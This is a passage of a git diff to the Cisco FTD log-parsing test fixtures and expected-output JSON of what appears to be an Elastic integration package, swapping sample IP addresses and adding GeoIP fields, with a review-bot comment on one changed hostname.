 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311",
 "code": "430005",
 "kind": "alert",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log
index 2742be4b533..ca647162cfc 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log
@@ -1,3 +1,3 @@
-<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
+<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
 Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233
 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
index 8c3dccf6eb1..e61077af9b2 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
@@ -5,9 +5,27 @@
 "level": "notification"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
+ "location": {
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
+ },
+ "address": "81.2.69.144",
 "port": 53,
- "address": "203.0.113.42",
- "ip": "203.0.113.42"
+ "ip": "81.2.69.144"
 },
 "syslog": {
 "facility": {
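Review bot: The replacement in the changed line of test-not-ip.log also rewrites the digits inside `WHAT-IS-THIS-A-HOSTNAME-192.0.2.244`, which the expected output treats as a host label (`source.domain`, `related.hosts`) rather than as an address, so the test-GeoIP-database constraint that motivates this change does not apply to it. The edit swaps an RFC 5737 documentation address embedded in a hostname for an RFC 1918 one, which makes the fixture read like a real private-network host while adding nothing to what this case checks (a hostname that merely looks like an IP). Keeping the label and changing only the destination, `LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/81.2.69.144(53)`, would also spare the `source.address`, `source.domain` and `related.hosts` edits in the expected-JSON hunks that follow.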
@@ -16,8 +34,8 @@ }, "source": { "port": 27218, - "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244", - "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244", + "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" }, "tags": [ "preserve_original_event" @@ -47,16 +65,16 @@ }, "related": { "hosts": [ - "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" ], "ip": [ - "203.0.113.42" + "81.2.69.144" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.493447500Z", - "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:35:10.569363700Z", + "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -120,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.493459100Z", + "ingested": "2021-12-09T13:35:10.569371900Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -202,7 +220,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.493461200Z", + "ingested": "2021-12-09T13:35:10.569377300Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", 
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log
index 09da866b488..663de2ad75a 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log
@@ -1,71 +1,71 @@
-Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0]
-Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0]
-Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]
-Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]
-Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834
-Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)
-Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882
-Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)
-Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392
-Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)
-Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140
-Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999
+Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0]
+Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0]
+Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]
+Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]
+Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834
+Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)
+Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882
+Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)
+Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392
+Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)
+Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140
+Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999
 Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233
-Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879
-Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)
-Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query
-Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879
+Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)
+Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query
+Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
 Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside
-Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query
-Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0]
-Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0]
-Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
-Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside
+Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query
+Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0]
+Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0]
+Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
+Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]
 Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)
-Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613]
-Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613]
-Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)
-Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)
-Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs
-Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs
-Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs
-Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside
-Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside
-Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21]
-Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)
-Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)
-Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs
+Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613]
+Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613]
+Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)
+Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)
+Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs
+Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs
+Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs
+Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside
+Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside
+Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21]
+Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)
+Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)
+Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs
 Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416
-Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic
-Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic
-Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic
-Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic
-Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic
-Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic
+Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic
+Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic
+Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic
+Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic
+Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic
+Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic
 Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic
 Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic
-Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]"
+Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]"
 Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside
 Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session
-Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com
-Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware
-Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware
-Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app
-Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com
-Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside
+Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com
+Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware
